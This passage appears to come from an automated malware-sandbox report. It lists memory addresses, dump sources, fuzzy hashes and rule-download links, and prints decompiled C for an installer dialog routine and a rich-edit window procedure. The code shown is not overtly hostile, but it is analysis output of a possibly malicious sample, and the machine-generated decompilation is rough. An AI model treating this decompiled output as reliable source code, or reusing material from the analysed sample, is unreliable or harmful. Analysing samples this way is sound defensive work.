                                      0x004068ac
                                      0x004068ad
                                      0x004068ad
                                      0x004068b5
                                      0x004068b8
                                      0x004068bc
                                      0x004068be
                                      0x004068c0
                                      0x004068c3
                                      0x00000000
                                      0x00000000
                                      0x004068cb
                                      0x004068d1
                                      0x004068d3
                                      0x004068d5
                                      0x004068d6
                                      0x004068eb
                                      0x004068eb
                                      0x004068ee
                                      0x004068f0
                                      0x004068f0
                                      0x004068f2
                                      0x004068f7
                                      0x004068f9
                                      0x00406900
                                      0x00406902
                                      0x0040690a
                                      0x0040690a
                                      0x0040690c
                                      0x0040690d
                                      0x0040691c
                                      0x00406920
                                      0x00406924
                                      0x00406927
                                      0x0040692a
                                      0x0040692f
                                      0x00406932
                                      0x00406938
                                      0x0040693f
                                      0x00406945
                                      0x00406b3e
                                      0x00406b3e
                                      0x00406b43
                                      0x00406b52
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00406b43
                                      0x00406952
                                      0x00406955
                                      0x00406958
                                      0x0040695b
                                      0x0040695f
                                      0x00000000
                                      0x00000000
                                      0x0040696a
                                      0x0040696d
                                      0x0040696e
                                      0x00406970
                                      0x00406976
                                      0x00406979
                                      0x00000000
                                      0x00000000
                                      0x0040697f
                                      0x00406980
                                      0x00406983
                                      0x00406986
                                      0x00406989
                                      0x0040698f
                                      0x00406991
                                      0x00406991
                                      0x00406999
                                      0x0040699d
                                      0x004069a2
                                      0x004069c7
                                      0x004069cd
                                      0x004069cf
                                      0x004069d1
                                      0x004069d4
                                      0x004069dd
                                      0x00000000
                                      0x00000000
                                      0x004069a4
                                      0x004069a4
                                      0x004069ad
                                      0x004069b1
                                      0x00000000
                                      0x00000000
                                      0x004069c2
                                      0x004069c2
                                      0x004069c5
                                      0x00000000
                                      0x00000000
                                      0x004069b5
                                      0x004069b8
                                      0x004069ba
                                      0x004069be
                                      0x00000000
                                      0x00000000
                                      0x004069c0
                                      0x004069c0
                                      0x00000000
                                      0x004069c2
                                      0x004069e6
                                      0x004069ec
                                      0x004069f6
                                      0x004069f8
                                      0x004069fd
                                      0x004069ff
                                      0x00406a35
                                      0x00406a01
                                      0x00406a01
                                      0x00406a04
                                      0x00406a07
                                      0x00406a11
                                      0x00406a14
                                      0x00406a1b
                                      0x00406a26
                                      0x00406a2d
                                      0x00406a2d
                                      0x00406a37
                                      0x00406a3a
                                      0x00406a3c
                                      0x00406a42
                                      0x00406a42
                                      0x00406a4b
                                      0x00406a4e
                                      0x00406a53
                                      0x00406a62
                                      0x00406a6a
                                      0x00406a6f
                                      0x00406a93
                                      0x00406a9b
                                      0x00406a9f
                                      0x00406aa5
                                      0x00406a71
                                      0x00406a7f
                                      0x00406a82
                                      0x00406a88
                                      0x00406a88
                                      0x00406aa9
                                      0x00406a64
                                      0x00406a64
                                      0x00406a64
                                      0x00406aba
                                      0x00406abe
                                      0x00406aca
                                      0x00406ac5
                                      0x00406ac8
                                      0x00406ac8
                                      0x00406ad2
                                      0x00406ad7
                                      0x00406adf
                                      0x00406adb
                                      0x00406add
                                      0x00406add
                                      0x00406ae5
                                      0x00406ae7
                                      0x00406aee
                                      0x00406af8
                                      0x00406b02
                                      0x00406b1e
                                      0x00406b22
                                      0x00406967
                                      0x0040696d
                                      0x0040696e
                                      0x00406970
                                      0x00406976
                                      0x00406979
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00406979
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00406b04
                                      0x00406b04
                                      0x00406b04
                                      0x00406b09
                                      0x00406b12
                                      0x00406b1b
                                      0x00000000
                                      0x00406b1b
                                      0x00406b28
                                      0x00406b28
                                      0x00406b2b
                                      0x00406b32
                                      0x00406b35
                                      0x00000000
                                      0x00406958
                                      0x004068d8
                                      0x004068da
                                      0x004068da
                                      0x004068de
                                      0x004068e1
                                      0x004068e2
                                      0x004068e2
                                      0x00000000
                                      0x004068da
                                      0x0040684e
                                      0x00406854
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9c33ce0fc1a3953d6a0fdc535813205e5f0e8e75a81554b33e1599d899765756
                                      • Instruction ID: 233014ff28be9fca5e40c1aeee1244862099a57bf12043c09a7623bfee50ec27
                                      • Opcode Fuzzy Hash: 9c33ce0fc1a3953d6a0fdc535813205e5f0e8e75a81554b33e1599d899765756
                                      • Instruction Fuzzy Hash: D0C13B71A00259CBCF14DF68C4905EEB7B2FF99314F26826AD856B7380D734A952CF94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 10021DE2, Relevance: .2, Instructions: 239COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e07f1f685b7678dabf478a0372837320e52790d716c8f4746af70269fbe044e1
                                      • Instruction ID: 49b4755438ab4d8111c3a1aaf7cd74036fa9e8587b46128106551c2c230e5c6e
                                      • Opcode Fuzzy Hash: e07f1f685b7678dabf478a0372837320e52790d716c8f4746af70269fbe044e1
                                      • Instruction Fuzzy Hash: B9B1241485D2EDADCB06CBF945647FCBFB05E2A102F4841CAE4E5E6243C13A938EDB21
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 10021DF1, Relevance: .2, Instructions: 231COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a50d93217743a047cafb7f1e34b36398fa724113789ff6e9b9acdd2a43a919f5
                                      • Instruction ID: 7be49e31fe22976ccc5b55604b8cfd687df9973143a68804b79f5c353f6fca13
                                      • Opcode Fuzzy Hash: a50d93217743a047cafb7f1e34b36398fa724113789ff6e9b9acdd2a43a919f5
                                      • Instruction Fuzzy Hash: A6B1025485D2EDADCB06CBF945607FCBFB05D2A102F4845CAE0E5E6283C53A938EDB21
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 100219FE, Relevance: .1, Instructions: 61COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 33a51492acd799fda5257bf088777f214ccb1d9f9f441b58e2bbc693c92cdb2e
                                      • Instruction ID: ba8d0d9fb4df3a950d7502f24f35878e0de78a1196af78e9498ea0f629eb56fc
                                      • Opcode Fuzzy Hash: 33a51492acd799fda5257bf088777f214ccb1d9f9f441b58e2bbc693c92cdb2e
                                      • Instruction Fuzzy Hash: 0A11C239A01119AFCB10DBA9E8889EEF7FEEF55690BA100A5E805D3310E770DE41C660
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 10021AEE, Relevance: .0, Instructions: 26COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bc1e897972a7d9dc8875f39a415db8f1ab4cad54cee1718619e07451133396d9
                                      • Instruction ID: c39fbee629e3b25723361ae6a02ff610ea9980670189e7066da88d458ebc28b3
                                      • Opcode Fuzzy Hash: bc1e897972a7d9dc8875f39a415db8f1ab4cad54cee1718619e07451133396d9
                                      • Instruction Fuzzy Hash: 20E06D397605059F8B44CBA8D881D55B3F4EB18320B504290FC15C73A0F734FE009650
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 10021B2C, Relevance: .0, Instructions: 23COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                      • Instruction ID: 301434674d526d08e336034e213995b70ac642decfab649642bafa51127c4dad
                                      • Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                      • Instruction Fuzzy Hash: ABE08C3A311550ABC362CB29E484C82F3FAEB982B17A6486AEC59D3B11E730FC01C650
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 10021AAF, Relevance: .0, Instructions: 7COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                      • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                      • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                      • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 1000C640, Relevance: 44.0, APIs: 1, Strings: 24, Instructions: 226COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: _memcmp
                                      • String ID: file:$file:$ftp:$ftp:$gopher:$gopher:$http:$http:$https:$https:$mailto:$mailto:$news:$news:$nntp:$nntp:$prospero:$prospero:$telnet:$telnet:$wais:$wais:$www.$www.
                                      • API String ID: 2931989736-3063889326
                                      • Opcode ID: 10494f7b14621bab5a5444976b80f5e839e8e90054fa884e4ba03b12bcab5166
                                      • Instruction ID: fa2b97cb6725e30e52d5af7a2f7ec8eb6098a6d4e11bfc0a15ccf9cf1fe24cb3
                                      • Opcode Fuzzy Hash: 10494f7b14621bab5a5444976b80f5e839e8e90054fa884e4ba03b12bcab5166
                                      • Instruction Fuzzy Hash: 86B1C6B9D00229CBEB14CF68D981BDDB7B1FB58300F6081AAE909E3355E7306A95CF55
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00403E25, Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 204windowstringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 93%
                                      			E00403E25(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char* _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				intOrPtr _t71;
				intOrPtr _t85;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x429fb8 =  *0x429fb8 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403D44(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x42db00;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42eb68, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42eb68, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x429fb8 != 0) {
						goto L25;
					} else {
						_t112 =  *0x4297a8 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403CFF(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004040B0();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42e33c; // 0x7278ea
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_t71 =  *0x42eb98; // 0x725d88
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 + _t71;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403DF1;
				E00403CDD(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403CDD(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403CFF( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403D12(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t85 =  *0x42eb70; // 0x720250
				_t86 =  *(_t85 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x428f9c =  *0x428f9c & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x429fb8 =  *0x429fb8 & 0x00000000;
				return 0;
			}




















                                      0x00403e35
                                      0x00403f5b
                                      0x00403fb7
                                      0x00403fbb
                                      0x00404092
                                      0x00404094
                                      0x00404094
                                      0x0040409a
                                      0x0040409a
                                      0x0040409d
                                      0x00000000
                                      0x004040a4
                                      0x00403fc9
                                      0x00403fcb
                                      0x00403fd5
                                      0x00403fe0
                                      0x00403fe3
                                      0x00403fe6
                                      0x00403ff1
                                      0x00403ff4
                                      0x00403ffb
                                      0x00404009
                                      0x00404021
                                      0x00404034
                                      0x00404044
                                      0x00404046
                                      0x00404046
                                      0x00403ffb
                                      0x00404050
                                      0x00000000
                                      0x0040405b
                                      0x0040405f
                                      0x00404070
                                      0x00404070
                                      0x00404076
                                      0x00404084
                                      0x00404084
                                      0x00000000
                                      0x00404088
                                      0x00404050
                                      0x00403f66
                                      0x00000000
                                      0x00403f7a
                                      0x00403f80
                                      0x00403f86
                                      0x00000000
                                      0x00000000
                                      0x00403fab
                                      0x00403fad
                                      0x00403fb2
                                      0x00000000
                                      0x00403fb2
                                      0x00403f66
                                      0x00403e3b
                                      0x00403e3e
                                      0x00403e43
                                      0x00403e45
                                      0x00403e54
                                      0x00403e54
                                      0x00403e56
                                      0x00403e5b
                                      0x00403e5e
                                      0x00403e60
                                      0x00403e65
                                      0x00403e6e
                                      0x00403e74
                                      0x00403e80
                                      0x00403e83
                                      0x00403e8c
                                      0x00403e91
                                      0x00403e94
                                      0x00403e99
                                      0x00403eb0
                                      0x00403eb7
                                      0x00403eca
                                      0x00403ecd
                                      0x00403ee2
                                      0x00403ee4
                                      0x00403ee9
                                      0x00403eee
                                      0x00403ef3
                                      0x00403ef3
                                      0x00403f02
                                      0x00403f11
                                      0x00403f13
                                      0x00403f29
                                      0x00403f38
                                      0x00403f3a
                                      0x00000000

                                      APIs
                                      • CheckDlgButton.USER32 ref: 00403EB0
                                      • GetDlgItem.USER32 ref: 00403EC4
                                      • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00403EE2
                                      • GetSysColor.USER32(?), ref: 00403EF3
                                      • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00403F02
                                      • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00403F11
                                      • lstrlenA.KERNEL32(?), ref: 00403F1B
                                      • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00403F29
                                      • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00403F38
                                      • GetDlgItem.USER32 ref: 00403F9B
                                      • SendMessageA.USER32(00000000), ref: 00403F9E
                                      • GetDlgItem.USER32 ref: 00403FC9
                                      • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404009
                                      • LoadCursorA.USER32 ref: 00404018
                                      • SetCursor.USER32(00000000), ref: 00404021
                                      • ShellExecuteA.SHELL32(0000070B,open,0042DB00,00000000,00000000,00000001), ref: 00404034
                                      • LoadCursorA.USER32 ref: 00404041
                                      • SetCursor.USER32(00000000), ref: 00404044
                                      • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404070
                                      • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404084
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                      • String ID: N$hqliygqis$open$xr
                                      • API String ID: 3615053054-3972903526
                                      • Opcode ID: 3195d29b63b907abe7959c186dfd862ee6b367c2438cb1dc7bf172a45b8d0b96
                                      • Instruction ID: ff75cf5183ce2723ba3e9af3fd3b1123c83c1709a93184edc862a5803e63a157
                                      • Opcode Fuzzy Hash: 3195d29b63b907abe7959c186dfd862ee6b367c2438cb1dc7bf172a45b8d0b96
                                      • Instruction Fuzzy Hash: 3861CEB1A40209BFEB109F60CD45F6A7B69EB44715F10843AFB05BA2D1C7B8AD51CF98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 1000BBE0, Relevance: 35.4, APIs: 17, Strings: 3, Instructions: 396COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 75%
                                      			E1000BBE0(void* __ebx, void* __edi, struct HWND__* _a4, int _a8, int _a12, long _a16, intOrPtr _a20) {
				struct HWND__** _v8;
				struct HWND__* _v12;
				struct HWND__* _v16;
				int _v20;
				int _v24;
				long _v28;
				struct HDC__* _v32;
				int _v36;
				signed int _v40;
				signed int _v44;
				char _v48;
				long _v52;
				signed int _v56;
				void* _v60;
				struct HDC__* _v64;
				struct HWND__* _v108;
				struct HWND__* _v112;
				int _v116;
				struct tagPAINTSTRUCT _v128;
				struct tagRECT _v144;
				struct HWND__** _t391;
				void* _t399;
				void* _t401;
				void* _t407;

				_t398 = __edi;
				_t288 = __ebx;
				_v28 = 0;
				0x10000000("enter hwnd %p msg %04x (%s) %lx %lx, unicode %d\n", _a4, _a8, E1000B6A0(_a8), _a12, _a16, _a20);
				_t401 = _t399 + 0x20;
				_v8 = GetWindowLongW(_a4, 0);
				if(_v8 != 0) {
					_v36 = _a8;
					if(_v36 > 0xcf) {
						if(_v36 == 0x44d) {
							_v56 = 0x14019c0;
							_v28 = E10001640(__ebx, __edi, _v8, _a8, _a12, _a16, _a20,  &_v48);
							_v44 = GetWindowLongW(_a4, 0xfffffff0);
							_v44 =  !_v56 & _v44 | _v28 & _v56;
							SetWindowLongW(_a4, 0xfffffff0, _v44);
							return _v28;
						}
						L30:
						_v28 = E10001640(_t288, _t398, _v8, _a8, _a12, _a16, _a20,  &_v48);
						if(_v48 == 1) {
							_v28 = DefWindowProcW(_a4, _a8, _a12, _a16);
						}
						0x10000000("exit hwnd %p msg %04x (%s) %lx %lx, unicode %d -> %lu\n", _a4, _a8, E1000B6A0(_a8), _a12, _a16, _a20, _v28);
						return _v28;
					}
					if(_v36 == 0xcf) {
						_v28 = E10001640(__ebx, __edi, _v8, _a8, _a12, _a16, _a20,  &_v48);
						_v40 = GetWindowLongW(_a4, 0xfffffff0);
						_v40 = _v40 & 0xfffff7ff;
						if(_a12 != 0) {
							_v40 = _v40 | 0x00000800;
						}
						SetWindowLongW(_a4, 0xfffffff0, _v40);
						return _v28;
					}
					if(_v36 == 0xf) {
						0x10000000(_v8);
						_t407 = _t401 + 4;
						_v32 = BeginPaint( *_v8,  &_v128);
						if(_v8[4] == 0) {
							L13:
							_push(0x400);
							_push(_v8);
							E10005000(_t243);
							_t407 = _t407 + 8;
							L14:
							_v60 = SelectObject(_v32, _v8[0x14]);
							if(_v116 < _v8[0x12a]) {
								_v24 = _v128.rcPaint;
								_v20 = _v116;
								_v16 = _v112;
								_v12 = _v108;
								_v12 = _v8[0x12a];
								PatBlt(_v32, _v24, _v20, _v16 - _v24, _v12 - _v20, 0xf00021);
								_v116 = _v8[0x12a];
							}
							if(_v108 > _v8[0x12c]) {
								_v24 = _v128.rcPaint;
								_v20 = _v116;
								_v16 = _v112;
								_v12 = _v108;
								_v20 = _v8[0x12c];
								PatBlt(_v32, _v24, _v20, _v16 - _v24, _v12 - _v20, 0xf00021);
								_v108 = _v8[0x12c];
							}
							if(_v128.rcPaint < _v8[0x129]) {
								_v24 = _v128.rcPaint;
								_v20 = _v116;
								_v16 = _v112;
								_v12 = _v108;
								_v16 = _v8[0x129];
								PatBlt(_v32, _v24, _v20, _v16 - _v24, _v12 - _v20, 0xf00021);
								_v128.rcPaint = _v8[0x129];
							}
							if(_v112 > _v8[0x12b]) {
								_v24 = _v128.rcPaint;
								_v20 = _v116;
								_v16 = _v112;
								_v12 = _v108;
								_v24 = _v8[0x12b];
								PatBlt(_v32, _v24, _v20, _v16 - _v24, _v12 - _v20, 0xf00021);
								_v112 = _v8[0x12b];
							}
							0x10000000(_v8, _v32,  &(_v128.rcPaint));
							SelectObject(_v32, _v60);
							EndPaint( *_v8,  &_v128);
							return 0;
						}
						_t391 = _v8;
						_t243 =  *(_t391 + 0x54) & 0x00000002;
						if(( *(_t391 + 0x54) & 0x00000002) == 0) {
							goto L14;
						}
						goto L13;
					}
					if(_v36 == 0x14) {
						_v64 = _a12;
						if(GetUpdateRect( *_v8,  &_v144, 1) != 0) {
							FillRect(_v64,  &_v144, _v8[0x14]);
						}
						return 1;
					}
					goto L30;
				}
				if(_a8 != 0x81) {
					return DefWindowProcW(_a4, _a8, _a12, _a16);
				}
				_v52 = _a16;
				0x10000000("WM_NCCREATE: hWnd %p style 0x%08x\n", _a4,  *((intOrPtr*)(_v52 + 0x20)));
				return E1000BB30(_a4, _v52, 0);
			}



























                                      0x1000bbe0
                                      0x1000bbe0
                                      0x1000bbe9
                                      0x1000bc16
                                      0x1000bc1b
                                      0x1000bc2a
                                      0x1000bc31
                                      0x1000bc91
                                      0x1000bc9b
                                      0x1000bcc6
                                      0x1000bf2f
                                      0x1000bf56
                                      0x1000bf65
                                      0x1000bf78
                                      0x1000bf85
                                      0x00000000
                                      0x1000bf8b
                                      0x1000bff7
                                      0x1000c017
                                      0x1000c01e
                                      0x1000c036
                                      0x1000c036
                                      0x1000c063
                                      0x00000000
                                      0x1000c06b
                                      0x1000bca4
                                      0x1000bfb3
                                      0x1000bfc2
                                      0x1000bfcd
                                      0x1000bfd4
                                      0x1000bfdf
                                      0x1000bfdf
                                      0x1000bfec
                                      0x00000000
                                      0x1000bff2
                                      0x1000bcae
                                      0x1000bcd5
                                      0x1000bcda
                                      0x1000bced
                                      0x1000bcf7
                                      0x1000bd04
                                      0x1000bd04
                                      0x1000bd0c
                                      0x1000bd0d
                                      0x1000bd12
                                      0x1000bd15
                                      0x1000bd26
                                      0x1000bd35
                                      0x1000bd3a
                                      0x1000bd40
                                      0x1000bd46
                                      0x1000bd4c
                                      0x1000bd58
                                      0x1000bd7a
                                      0x1000bd89
                                      0x1000bd89
                                      0x1000bd98
                                      0x1000bd9d
                                      0x1000bda3
                                      0x1000bda9
                                      0x1000bdaf
                                      0x1000bdbb
                                      0x1000bddd
                                      0x1000bdec
                                      0x1000bdec
                                      0x1000bdfb
                                      0x1000be00
                                      0x1000be06
                                      0x1000be0c
                                      0x1000be12
                                      0x1000be1e
                                      0x1000be40
                                      0x1000be4f
                                      0x1000be4f
                                      0x1000be5e
                                      0x1000be63
                                      0x1000be69
                                      0x1000be6f
                                      0x1000be75
                                      0x1000be81
                                      0x1000bea3
                                      0x1000beb2
